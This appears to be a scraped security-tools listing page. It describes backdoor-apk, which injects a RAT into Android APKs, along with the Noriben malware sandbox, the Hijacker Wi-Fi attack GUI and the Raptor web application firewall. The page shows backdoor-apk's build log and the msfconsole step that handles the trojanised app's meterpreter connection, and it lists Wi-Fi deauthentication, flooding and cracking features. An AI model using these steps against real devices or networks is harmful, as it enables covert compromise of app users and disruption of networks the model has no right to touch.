[*] Decompiling obfuscated RAT APK file...done.
[*] Creating new directories in original project for RAT smali files...done.
[*] Copying RAT smali files to new directories in original project...done.
[*] Fixing RAT smali files...done.
[*] Obfuscating const-string values in RAT smali files...done.
[*] Locating smali file to hook in original project...done.
[*] Adding hook in original smali file...done.
[*] Adding persistence hook in original project...done.
[*] Recompiling original project with backdoor...done.
[*] Generating RSA key for signing...done.
[*] Signing recompiled APK...done.
[*] Verifying signed artifacts...done.
[*] Aligning recompiled APK...done.
root@kali:~/Android/evol-lab/BaiduBrowserRat#

The recompiled APK will be found in the 'original/dist' directory. Install the APK on a compatible Android device, run it, and handle the meterpreter connection via the generated resource script: msfconsole -r backdoor-apk.rc

Download backdoor-apk

Noriben is a Python-based script that works in conjunction with Sysinternals Procmon to automatically collect, analyze, and report on runtime indicators of malware. In a nutshell, it allows you to run your malware, hit a keypress, and get a simple text report of the sample's activities.

Noriben allows you to not only run malware similar to a sandbox, but to also log system-wide events while you manually run malware in ways particular to making it run. For example, it can listen as you run malware that requires varying command line options. Or, watch the system as you step through malware in a debugger.

Noriben only requires Sysinternals procmon.exe (or procmon64.exe) to operate. It requires no pre-filtering (though it would greatly help) as it contains numerous white list items to reduce unwanted noise from system activity.

Cool Features

If you have a folder of YARA signature files, you can specify it with the --yara option. Every new file create will be scanned against these signatures with the results displayed in the output results.

If you have a VirusTotal API, place it into a file named "virustotal.api" (or embed directly in the script) to auto-submit MD5 file hashes to VT to get the number of viral results.

You can add lists of MD5s to auto-ignore (such as all of your system files). Use md5deep and throw them into a text file, use --hash to read them.

You can automate the script for sandbox-usage. Using -t to automate execution time, and --cmd "path\exe" to specify a malware file, you can automatically run malware, copy the results off, and then revert to run a new sample.

The --generalize feature will automatically substitute absolute paths with Windows environment paths for better IOC development. For example, C:\Users\malware_user\AppData\Roaming\malware.exe will be automatically resolved to %AppData%\malware.exe.

Usage:

--===[ Noriben v1.6 ]===--
--===[   @bbaskin   ]===--

usage: Noriben.py [-h] [-c CSV] [-p PML] [-f FILTER] [--hash HASH]
                  [-t TIMEOUT] [--output OUTPUT] [--yara YARA] [--generalize]
                  [--cmd CMD] [-d]

optional arguments:
  -h, --help            show this help message and exit
  -c CSV, --csv CSV     Re-analyze an existing Noriben CSV file
  -p PML, --pml PML     Re-analyze an existing Noriben PML file
  -f FILTER, --filter FILTER
                        Specify alternate Procmon Filter PMC
  --hash HASH           Specify MD5 file whitelist
  -t TIMEOUT, --timeout TIMEOUT
                        Number of seconds to collect activity
  --output OUTPUT       Folder to store output files
  --yara YARA           Folder containing YARA rules
  --generalize          Generalize file paths to their environment variables.
                        Default: True
  --cmd CMD             Command line to execute (in quotes)
  -d                    Enable debug tracebacks

Download Noriben

Hijacker is a Graphical User Interface for the wireless auditing tools airodump-ng, aireplay-ng and mdk3. It offers a simple and easy UI to use these tools without typing commands in a console and copy&pasting MAC addresses.

This application requires an android device with a wireless adapter that supports Monitor Mode . A few android devices do, but none of them natively. This means that you will need a custom firmware. Nexus 5 and any other device that uses the BCM4339 (and BCM4358 (although injection is not yet supported so no aireplay or mdk)) chipset will work with Nexmon . Also, devices that use BCM4330 can use bcmon . An alternative would be to use an external adapter that supports monitor mode in Android with an OTG cable.

The required tools are included in the app. To install them go to Settings and click "Install Tools". This will install everything in the directory you select. If you have already installed them, you don't have to do anything. You can also have them at any directory you want and set the directories in Settings, though this might cause the wireless tools not being found by the aircrack-ng suite. The Nexmon driver and management utility is also included.

Root is also necessary, as these tools need root to work. If you don't grant root permissions to it, it hangs... for some reason... don't know why...

Features:

View a list of access points and stations (clients) around you (even hidden ones)
View the activity of a network (by measuring beacons and data packets) and its clients
Deauthenticate all the clients of a network
Deauthenticate a specific client from the network it's connected
MDK3 Beacon Flooding with custom SSID list
MDK3 Authentication DoS for a specific network or to everyone
Try to get a WPA handshake or gather IVs to crack a WEP network
Statistics about access points (only encryption for now)
See the manufacturer of a device (AP or station) from a OUI database (pulled from IEEE)
See the signal power of devices and filter the ones that are closer to you
Leave the app running in the background, optionally with a notification
Copy commands or MAC addresses to clipboard, so you can run them in a terminal if something goes wrong
Include the tools
Reaver WPS cracking (pixie-dust attack using NetHunter chroot and external adapter)
.cap files cracking with custom wordlist
Save captured packets in .cap file
Create custom commands to be ran on an access point or a client with one click

Installation:

Make sure:

you are on Android 5+
you are rooted. SuperSU is required. If you are on CM, install SuperSU
have installed busybox (opened and installed the tools)
have a firmware to support Monitor Mode on your wireless interface

Download the latest version here .

When you run Hijacker for the first time, you will be asked whether you want to set up the tools or go to home screen. If you have installed your firmware and all the tools, you can just go to the home screen. Otherwise, click set up to install the tools. You can change the directories in which they will be installed, but I recommend that you leave them unchanged. The app will check what directories are available and select the best for you. Keep in mind that on some devices, installing files in /system might trigger an Android security feature and your system partition will be restored when you reboot. After installing the tools and the firmware (only Nexmon) you will land on the home screen and airodump will start. If you don't see any networks, make sure you have enabled your WiFi and it's in monitor mode. If you have a problem, go to settings and click "Test Tools". If they all pass, you probably don't have monitor mode enabled. If something fails, click "Copy test command" and select the tool that fails. A sample command will be copied to your clipboard so you can open a terminal, run it, and see what's wrong.

Keep in mind that Hijacker is just a GUI for these tools. The way it runs the tools is fairly simple, and if all the tests pass and you are in monitor mode, then you should be getting the results you want. But also keep in mind that these are AUDITING tools. This means that they are used to TEST the integrity of your network, so there is a chance (and you should hope for it) that the attacks don't work on a network. It's not the app's fault, it's actually something to be happy about (given that this means that your network is safe). However, if an attack works when you type a command in a terminal, but not with the app, feel free to post here to resolve the issue. This app is still under development so bugs are to be expected.

Troubleshooting:

First of all, if the app happens to crash at a random time, run it again and close it properly. This is to make sure that there are not any tools still running in the background, as this can cause battery drain. If it crashes during startup or exiting, open a terminal, run ps | busybox grep -e air -e mdk and kill the processes you see.

Most of the problems arise from the binaries not being installed (correctly or at all). If that's the case, go to settings, click "install tools", choose directories for binaries and the lib (libfakeioctl.so) and click install. If the directory for your binaries is included in PATH, then you don't have to do anything else. If it's not, the you need to adjust the absolute paths of the binaries, right below the "install tools" option. This might also cause problems (especially with mdk) since these programs require the wireless tools to be installed, and they won't find them if you install them anywhere other than the paths included in your PATH variable. If you don't know what the PATH variable is, then you probably shouldn't be using any of these programs.

Installing the tools via the NexMon app doesn't work anymore, so if there is a problem, just reinstall them through the app in the same directory you have them already.

If you are certain that there is problem with the app itself and not the tools installation, open an issue here so I can fix it. Make sure to include precise steps to reproduce the problem and a logcat (having the logcat messages options enabled in settings). If the app happens to crash, a new activity should start which will generate a report in /sdcard and give you the option to email it to me directly. I suggest you do that, and if you are worried about what will be sent you can check it out yourself, it's just a txt file and it will be sent as an email attachment to me.

Download Hijacker

Raptor WAF is a simple web application firewall made in C, using KISS principle, to make poll use select() function, is not better than epoll() or kqueue() from *BSD but is portable, the core of match engine using DFA to detect XSS, SQLi and path traversal.

No more words, look at the following :

WAF stands for Web Application Firewall. It is widely used nowadays to detect and defend SQL Injections and XSS...

You can block XSS, SQL injection attacks and path traversal with Raptor
You can use blacklist of IPs to block some users at config/blacklist ip.txt
You can use IPv6 and IPv4 at communications
At the future DoS protector, request limit, rule interpreter and Malware detector at uploads.
At the future SSL/TLS...

to run:

$ git clone https://github.com/CoolerVoid/raptor_waf
$ cd raptor_waf; make; bin/raptor

Example

Up some HTTPd server at port 80

$ bin/Raptor -h localhost -p 80 -r 8883 -w 4 -o loglog.txt

you can test at http://localhost:8883/test.php

Look the docs

https://github.com/CoolerVoid/raptor_waf/blob/master/doc/raptor.pdf

Download Raptor

Hashcat v3.20 - World's Fastest and Most Advanced Password Recovery Utility

GPU Driver requirements:

Features

Algorithms

Attack-Modes

Supported OpenCL runtimes

Supported OpenCL device types

Al-Khaser v0.65 - Public Malware Techniques Used In The Wild

pulledpork - Pulled Pork for Snort and Suricata Rule Management

Cosa Nostra - A FOSS Graph Based Malware Clusterization Toolkit

PhishLulz - Ruby toolset aimed at automating Phishing activities

dedsploit - Framework For Attacking Network Protocols

OONI - Open Observatory of Network Interference

FileBuster - An Extremely Fast And Flexible Web Fuzzer

FTP Password Recovery - Command-line Lost or Forgotten FTP Password Finder Tool for Windows

BackdoorMan - Toolkit That Helps You Find Malicious, Hidden And Suspicious PHP Scripts And Shells

Burp Suite Professional 1.7.14 - The Leading Toolkit for Web Application Security Testing

PyJFuzz - Python JSON Fuzzer

WiFiPhisher v1.2 - Automated victim-customized phishing attacks against Wi-Fi clients

Morpheus - Automated Ettercap TCP/IP Hijacking Tool

MSF-Remote-Console - A Remote Msfconsole To Connect To The Msfrcpd Server Of Metasploit

Wifi-Dumper - Tool To Dump The Wifi Profiles And Cleartext Passwords Of The Connected Access Points On The Windows Machine

backdoor-apk - shell script that simplifies the process of adding a backdoor to any Android APK file

Noriben - Portable, Simple, Malware Analysis Sandbox

Hijacker - Aircrack, Airodump, Aireplay, MDK3 and Reaver GUI Application for Android

Raptor WAF v0.04 - Web Application Firewall using DFA

to run:

Example

Look the docs